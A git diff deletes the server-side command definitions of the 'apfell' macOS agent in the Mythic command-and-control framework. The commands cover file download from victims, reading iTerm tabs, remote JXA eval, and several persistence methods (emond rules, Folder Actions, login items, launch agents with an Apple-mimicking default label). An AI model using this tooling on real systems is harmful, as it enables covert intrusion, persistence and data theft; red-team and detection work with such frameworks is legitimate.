- version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1033"] - argument_class = CurrentUserArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - if task.args.get_arg("method") == "jxa": - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="Target Application of System Events", - artifact_type="AppleEvent Sent", - ) - else: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="NSUserName, NSFullUserName, NSHomeDirectory", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/download.py b/Payload_Types/apfell/mythic/agent_functions/download.py deleted file mode 100644 index fcfff9bf3..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/download.py +++ /dev/null @@ -1,49 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class DownloadArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - temp_json = json.loads(self.command_line) - if "host" in temp_json: - # this means we have tasking from the file browser rather than the popup UI - # the apfell agent doesn't currently have the ability to do _remote_ listings, so we ignore it - self.command_line = temp_json["path"] + "/" + temp_json["file"] - else: - raise Exception("Unsupported JSON") - - -class DownloadCommand(CommandBase): - cmd = "download" - needs_admin = False - help_cmd = "download {path to remote file}" - description = "Download a file from the victim machine to the Mythic server in chunks (no need for quotes in the path)." - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = True - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - parameters = [] - attackmapping = ["T1020", "T1030", "T1041"] - argument_class = DownloadArguments - browser_script = BrowserScript(script_name="download", author="@its_a_feature_") - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.NSFileHandle.fileHandleForReadingAtPath, readDataOfLength", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/exit.py b/Payload_Types/apfell/mythic/agent_functions/exit.py deleted file mode 100644 index 9ed3273f3..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/exit.py +++ /dev/null @@ -1,39 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class ExitArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - pass - - -class ExitCommand(CommandBase): - cmd = "exit" - needs_admin = False - help_cmd = "exit" - description = "This exits the current apfell agent by leveraging the ObjectiveC bridge's NSApplication terminate function." 
- version = 1 - is_exit = True - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = [] - argument_class = ExitArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.NSApplication.sharedApplication.terminate", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/get_config.py b/Payload_Types/apfell/mythic/agent_functions/get_config.py deleted file mode 100644 index 049600e50..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/get_config.py +++ /dev/null @@ -1,39 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class GetConfigArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - pass - - -class GetConfigCommand(CommandBase): - cmd = "get_config" - needs_admin = False - help_cmd = "get_config" - description = "Gets the current running config via the C2 class" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1082"] - argument_class = GetConfigArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.NSProcessInfo.processInfo.*, $.NSHost.currentHost.*", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/hostname.py b/Payload_Types/apfell/mythic/agent_functions/hostname.py deleted file mode 100644 index 52c6ed543..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/hostname.py +++ /dev/null @@ -1,39 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class HostnameArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - pass - - -class HostnameCommand(CommandBase): - cmd = "hostname" - needs_admin = False - help_cmd = "hostname" - description = "Get the various hostnames associated with the host, including the NETBIOS name if the computer is domain joined" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = [] - argument_class = HostnameArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.NSHost.currentHost.names", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/ifconfig.py b/Payload_Types/apfell/mythic/agent_functions/ifconfig.py deleted file mode 100644 index 873f3e4d7..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/ifconfig.py +++ /dev/null @@ -1,39 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class IfconfigArguments(TaskArguments): - def __init__(self, 
command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - pass - - -class IfconfigCommand(CommandBase): - cmd = "ifconfig" - needs_admin = False - help_cmd = "ifconfig" - description = "Return all the IP addresses associated with the host" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = [] - argument_class = IfconfigArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.NSHost.currentHost.addresses", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/iterm.py b/Payload_Types/apfell/mythic/agent_functions/iterm.py deleted file mode 100644 index 8bbe8ee36..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/iterm.py +++ /dev/null @@ -1,39 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class ITermArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - pass - - -class ITermCommand(CommandBase): - cmd = "iTerm" - needs_admin = False - help_cmd = "iTerm" - description = "Read the contents of all open iTerm tabs if iTerms is open, otherwise just inform the operator that it's not currently running" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1139", "T1056"] - argument_class = ITermArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="Target Application of iTerm", - artifact_type="AppleEvent Sent", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/jscript.py b/Payload_Types/apfell/mythic/agent_functions/jscript.py deleted file mode 100644 index 4929ad07a..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/jscript.py +++ /dev/null @@ -1,47 +0,0 @@ -from CommandBase import * -import json - - -class JscriptArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "command": CommandParameter( - name="command", - type=ParameterType.String, - description="The JXA command to execute", - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - self.add_arg("command", self.command_line) - else: - raise ValueError("Missing arguments") - pass - - -class JscriptCommand(CommandBase): - cmd = "jscript" - needs_admin = False - help_cmd = "jscript {command}" - description = "This runs the JavaScript command, {command}, and returns its output via an eval(). 
The output will get passed through ObjC.deepUnwrap to parse out basic data types from ObjectiveC and get strings back" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1064"] - argument_class = JscriptArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/jsimport.py b/Payload_Types/apfell/mythic/agent_functions/jsimport.py deleted file mode 100644 index 758380008..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/jsimport.py +++ /dev/null @@ -1,58 +0,0 @@ -from CommandBase import * -from MythicFileRPC import * -import json - - -class JsimportArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "file": CommandParameter( - name="file", - type=ParameterType.File, - description="Select a JXA file to upload", - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON arguments") - else: - raise ValueError("Missing arguments") - pass - - -class JsimportCommand(CommandBase): - cmd = "jsimport" - needs_admin = False - help_cmd = "jsimport" - description = "import a JXA file into memory. Only one can be imported at a time." - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = [] - argument_class = JsimportArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - original_file_name = json.loads(task.original_params)["file"] - response = await MythicFileRPC(task).register_file( - file=task.args.get_arg("file"), - saved_file_name=original_file_name, - delete_after_fetch=True, - ) - if response.status == MythicStatus.Success: - task.args.add_arg("file", response.agent_file_id) - else: - raise Exception("Error from Mythic: " + response.error_message) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/jsimport_call.py b/Payload_Types/apfell/mythic/agent_functions/jsimport_call.py deleted file mode 100644 index 104cc9c19..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/jsimport_call.py +++ /dev/null @@ -1,47 +0,0 @@ -from CommandBase import * -import json - - -class JsimportCallArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "command": CommandParameter( - name="command", - type=ParameterType.String, - description="The command to execute within a file loaded via jsimport", - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - self.add_arg("command", self.command_line) - else: - raise ValueError("Missing arguments") - pass - - -class JsimportCallCommand(CommandBase): - cmd = "jsimport_call" - needs_admin = False - help_cmd = "jsimport_call function_call();" - description = "call a function from within the JS file that was imported with 'jsimport'. 
This function call is appended to the end of the jsimport code and called via eval." - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1155", "T1064"] - argument_class = JsimportCallArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/launchapp.py b/Payload_Types/apfell/mythic/agent_functions/launchapp.py deleted file mode 100644 index 9db225720..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/launchapp.py +++ /dev/null @@ -1,54 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class LaunchAppArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "bundle": CommandParameter( - name="bundle", - type=ParameterType.String, - description="The Bundle name to launch", - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - self.add_arg("bundle", self.command_line) - else: - raise ValueError("Missing arguments") - pass - - -class LaunchAppCommand(CommandBase): - cmd = "launchapp" - needs_admin = False - help_cmd = "launchapp {bundle name}" - description = "This uses the Objective C bridge to launch the specified app asynchronously and 'hidden' (it'll still show up in the dock for now). An example of the bundle name is 'com.apple.itunes' for launching iTunes." - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = [] - argument_class = LaunchAppArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="xpcproxy {}".format( - task.args.get_arg("bundle"), - ), - artifact_type="Process Create", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/list_apps.py b/Payload_Types/apfell/mythic/agent_functions/list_apps.py deleted file mode 100644 index 70215cf3d..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/list_apps.py +++ /dev/null @@ -1,40 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class ListAppsArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - pass - - -class ListAppsCommand(CommandBase): - cmd = "list_apps" - needs_admin = False - help_cmd = "list_apps" - description = "This uses NSApplication.RunningApplications api to get information about running applications." 
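# register_artifact(), used by create_tasking() just below, is a thin wrapper over
# MythicBaseRPC.call(): the request dict is published to RabbitMQ as JSON and the reply
# is matched back to the awaiting future by correlation id. A representative call,
# mirroring the one in ListAppsCommand below:
#
#   resp = await MythicResponseRPC(task).register_artifact(
#       artifact_instance="$.NSWorkspace.sharedWorkspace.runningApplications",
#       artifact_type="API Called",
#   )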
- version = 1 - is_exit = False - is_file_browse = False - is_process_list = True - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1057"] - argument_class = ListAppsArguments - browser_script = BrowserScript(script_name="list_apps", author="@its_a_feature_") - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.NSWorkspace.sharedWorkspace.runningApplications", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/list_users.py b/Payload_Types/apfell/mythic/agent_functions/list_users.py deleted file mode 100644 index 96042dfe0..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/list_users.py +++ /dev/null @@ -1,67 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class ListUsersArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "gid": CommandParameter( - name="gid", - type=ParameterType.Number, - required=False, - default_value=-1, - description="Enumerate users in a specific group or -1 for all groups", - ), - "groups": CommandParameter( - name="groups", - type=ParameterType.Boolean, - required=False, - default_value=False, - description="Enumerate groups and their members ", - ), - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON arguments") - else: - raise ValueError("Missing arguments") - pass - - -class ListUsersCommand(CommandBase): - cmd = "list_users" - needs_admin = False - help_cmd = 'list_users' - description = "This uses JXA to list the non-service user accounts on the system. 
You can specify a GID to look at the users of a certain group or you can specify 'groups' to be true and enumerate users by groups" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1087", "T1069"] - argument_class = ListUsersArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - if task.args.get_arg("gid") < 0: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.CSGetLocalIdentityAuthority, $.CSIdentityQueryCreate, $.CSIdentityQueryExecute", - artifact_type="API Called", - ) - else: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.CBIdentityAuthority.defaultIdentityAuthority, $.CBGroupIdentity.groupIdentityWithPosixGIDAuthority", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/load.py b/Payload_Types/apfell/mythic/agent_functions/load.py deleted file mode 100644 index 132f434b4..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/load.py +++ /dev/null @@ -1,54 +0,0 @@ -from CommandBase import * -import json -from MythicFileRPC import * - - -class LoadArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - if len(self.command_line) == 0: - raise ValueError("Need to specify commands to load") - pass - - -class LoadCommand(CommandBase): - cmd = "load" - needs_admin = False - help_cmd = "load cmd1 cmd2 cmd3..." - description = "This loads new functions into memory via the C2 channel." - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - parameters = [] - attackmapping = ["T1030", "T1129"] - argument_class = LoadArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - total_code = "" - for cmd in task.args.command_line.split(" "): - cmd = cmd.strip() - try: - code_path = self.agent_code_path / "{}.js".format(cmd) - total_code += open(code_path, "r").read() + "\n" - except Exception as e: - raise Exception("Failed to find code for '{}'".format(cmd)) - resp = await MythicFileRPC(task).register_file( - total_code.encode(), delete_after_fetch=True - ) - if resp.status == MythicStatus.Success: - task.args.add_arg("file_id", resp.agent_file_id) - task.args.add_arg("cmds", task.args.command_line) - else: - raise Exception("Failed to register file: " + resp.error_message) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/ls.py b/Payload_Types/apfell/mythic/agent_functions/ls.py deleted file mode 100644 index 9cc2c5f34..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/ls.py +++ /dev/null @@ -1,58 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class LsArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "path": CommandParameter( - name="path", - type=ParameterType.String, - default_value=".", - description="Path of file or folder on the current system to list", - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - 
temp_json = json.loads(self.command_line) - if "host" in temp_json: - # this means we have tasking from the file browser rather than the popup UI - # the apfell agent doesn't currently have the ability to do _remote_ listings, so we ignore it - self.add_arg("path", temp_json["path"] + "/" + temp_json["file"]) - self.add_arg("file_browser", "true") - else: - self.add_arg("path", temp_json["path"]) - else: - self.add_arg("path", self.command_line) - - -class LsCommand(CommandBase): - cmd = "ls" - needs_admin = False - help_cmd = "ls /path/to/file" - description = "Get attributes about a file and display it to the user via API calls. No need for quotes and relative paths are fine" - version = 1 - is_exit = False - is_file_browse = True - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1106", "T1083"] - argument_class = LsArguments - browser_script = BrowserScript(script_name="ls", author="@its_a_feature_") - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="fileManager.attributesOfItemAtPathError, fileManager.contentsOfDirectoryAtPathError", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/persist_emond.py b/Payload_Types/apfell/mythic/agent_functions/persist_emond.py deleted file mode 100644 index e59761615..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/persist_emond.py +++ /dev/null @@ -1,69 +0,0 @@ -from CommandBase import * -import json - - -class PersistEmondArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "rule_name": CommandParameter( - name="rule_name", - type=ParameterType.String, - description="Rule name for inside of the plist", - ), - "payload_type": CommandParameter( - name="payload_type", - type=ParameterType.ChooseOne, - choices=["oneliner-jxa", "custom_bash-c"], - ), - "url": CommandParameter( - name="url", - type=ParameterType.String, - description="url of payload for oneliner-jxa for download cradle", - required=False, - ), - "command": CommandParameter( - name="command", - type=ParameterType.String, - required=False, - description="Command if type is custom_bash-c to execute via /bin/bash -c", - ), - "file_name": CommandParameter( - name="file_name", - type=ParameterType.String, - description="Name of plist in /etc/emond.d/rules/", - ), - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("missing JSON arguments") - else: - raise ValueError("Missing arguments") - pass - - -class PersistEmondCommand(CommandBase): - cmd = "persist_emond" - needs_admin = False - help_cmd = "persist_emond" - description = "Create persistence with an emond plist file in /etc/emond.d/rules/ and a .DS_Store file to trigger it" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1150"] - argument_class = PersistEmondArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - return task - - async def process_response(self, response: AgentResponse): - pass diff --git 
a/Payload_Types/apfell/mythic/agent_functions/persist_folderaction.py b/Payload_Types/apfell/mythic/agent_functions/persist_folderaction.py deleted file mode 100644 index c77aa4662..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/persist_folderaction.py +++ /dev/null @@ -1,74 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class PersistFolderactionArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "code": CommandParameter( - name="code", - type=ParameterType.String, - description="osascript code", - required=False, - ), - "url": CommandParameter( - name="url", - required=False, - type=ParameterType.String, - description="http://url.of.host/payload", - ), - "folder": CommandParameter( - name="folder", - type=ParameterType.String, - description="/path/to/folder/to/watch", - ), - "script_path": CommandParameter( - name="script_path", - type=ParameterType.String, - description="/path/to/script/to/create/on/disk", - ), - "language": CommandParameter( - name="language", - type=ParameterType.ChooseOne, - choices=["JavaScript", "AppleScript"], - description="If supplying custom 'code', this is the language", - ), - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON argument") - else: - raise ValueError("Missing arguments") - - -class PersistFolderactionCommand(CommandBase): - cmd = "persist_folderaction" - needs_admin = False - help_cmd = "persist_folderaction" - description = "Use Folder Actions to persist a compiled script on disk. You can either specify a 'URL' and automatically do a backgrounding one-liner, or supply your own code and language." 
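Tasking for persist_folderaction arrives as JSON keyed by the parameters declared above. A hypothetical example of the URL variant (the host and paths are placeholders, not values from this repository):

    import json

    # Placeholder operator tasking for persist_folderaction (URL variant).
    task_args = {
        "url": "http://192.0.2.10/payload.js",                   # hosted payload
        "folder": "/Users/victim/Downloads",                     # folder to watch
        "script_path": "/Users/victim/Library/Scripts/fa.scpt",  # compiled script on disk
        "language": "JavaScript",
    }
    print(json.dumps(task_args))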
- version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = [] - argument_class = PersistFolderactionArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="Target Application of System Events", - artifact_type="AppleEvent Sent", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/persist_launch.py b/Payload_Types/apfell/mythic/agent_functions/persist_launch.py deleted file mode 100644 index c6884cbbc..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/persist_launch.py +++ /dev/null @@ -1,76 +0,0 @@ -from CommandBase import * -import json - - -class PersistLaunchArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "args": CommandParameter( - name="args", - type=ParameterType.Array, - description="List of arguments to execute in the ProgramArguments section of the PLIST", - ), - "KeepAlive": CommandParameter( - name="KeepAlive", - type=ParameterType.Boolean, - default_value=True, - description="Restart the persistence if it crashes for some reason", - ), - "label": CommandParameter( - name="label", - type=ParameterType.String, - default_value="com.apple.softwareupdateagent", - description="The label for the launch element", - ), - "LaunchPath": CommandParameter( - name="LaunchPath", - type=ParameterType.String, - required=False, - description="Path to save new plist to if LocalAgent is false", - ), - "LocalAgent": CommandParameter( - name="LocalAgent", - type=ParameterType.Boolean, - default_value=True, - description="Should be a local user launch agent?", - ), - "RunAtLoad": CommandParameter( - name="RunAtLoad", - type=ParameterType.Boolean, - default_value=True, - description="Should the launch element be executed at load", - ), - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON arguments") - else: - raise ValueError("Missing arguments") - - -class PersistLaunchCommand(CommandBase): - cmd = "persist_launch" - needs_admin = False - help_cmd = "persist_launch" - description = "Create a launch agent or daemon plist file and either automatically put it in ~/Library/LaunchAgents or if LocalAgent is false, save it to the specified location. If you want an elevated launch agent or launch daemon( /Library/LaunchAgents or /Library/LaunchDaemons), you either need to be in an elevated context already and specify the path or use something like shell_elevated to copy it there. If the first arg is 'apfell-jxa' then the agent will automatically construct a plist appropriate oneliner to use where arg1 should be the URL to reach out to for the payload." 
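The parameters above map directly onto launchd plist keys. A sketch of the resulting launch agent, built with the standard library for illustration rather than taken from the agent's own template; the ProgramArguments value is a placeholder one-liner:

    import plistlib

    launch_agent = {
        "Label": "com.apple.softwareupdateagent",  # default label above
        "ProgramArguments": ["/usr/bin/osascript", "-l", "JavaScript",
                             "-e", "<download-cradle one-liner>"],  # placeholder
        "RunAtLoad": True,   # execute at load
        "KeepAlive": True,   # restart if it crashes
    }
    # A local agent would be written to ~/Library/LaunchAgents/<Label>.plist
    print(plistlib.dumps(launch_agent).decode())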
- version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1159", "T1160"] - argument_class = PersistLaunchArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/persist_loginitem_allusers.py b/Payload_Types/apfell/mythic/agent_functions/persist_loginitem_allusers.py deleted file mode 100644 index 28fed1153..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/persist_loginitem_allusers.py +++ /dev/null @@ -1,56 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class PersistLoginItemAllUsersArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "path": CommandParameter( - name="path", - type=ParameterType.String, - description="path to binary to execute on execution", - ), - "name": CommandParameter( - name="name", - type=ParameterType.String, - description="The name that is displayed in the Login Items section of the Users & Groups preferences pane", - ), - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON arguments") - else: - raise ValueError("Missing arguments") - - -class PersistLoginItemAllUsersCommand(CommandBase): - cmd = "persist_loginitem_allusers" - needs_admin = False - help_cmd = "persist_loginitem_allusers" - description = "Add a login item for all users via the LSSharedFileListInsertItemURL. The kLSSharedFileListGlobalLoginItems constant is used when creating the shared list in the LSSharedFileListCreate function. Before calling LSSharedFileListInsertItemURL, AuthorizationCreate is called to obtain the necessary rights. 
If the current user is not an administrator, the LSSharedFileListInsertItemURL function will fail" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@xorrior" - attackmapping = [] - argument_class = PersistLoginItemAllUsersArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.LSSharedFileListCreate, $.LSSharedFileListSetAuthorization, $.LSSharedFileListInsertItemURL", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/plist.py b/Payload_Types/apfell/mythic/agent_functions/plist.py deleted file mode 100644 index 69367a1cd..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/plist.py +++ /dev/null @@ -1,59 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class PlistArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "filename": CommandParameter( - name="filename", - type=ParameterType.String, - required=False, - description="full filename path of type is just read", - ), - "type": CommandParameter( - name="type", - type=ParameterType.ChooseOne, - choices=["readLaunchAgents", "readLaunchDaemons", "read"], - description="read a specific plist file or all launchagents/launchdaemons", - default_value="readLaunchAgents", - ), - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON arguments") - else: - raise ValueError("Missing arguments") - - -class PlistCommand(CommandBase): - cmd = "plist" - needs_admin = False - help_cmd = "plist" - description = "Read plists and their associated attributes for attempts to privilege escalate." 
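As a rough standard-library analogue of what the plist command inspects (the agent itself uses the ObjC calls registered as artifacts below), reading one plist plus its file permissions looks like this; the path is a placeholder:

    import os
    import plistlib
    import stat

    path = "/Library/LaunchDaemons/com.example.daemon.plist"  # placeholder
    with open(path, "rb") as f:
        contents = plistlib.load(f)
    mode = os.stat(path).st_mode
    print(contents.get("ProgramArguments"))
    # A world-writable daemon plist is a classic privilege-escalation lead.
    print(oct(mode), "world-writable:", bool(mode & stat.S_IWOTH))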
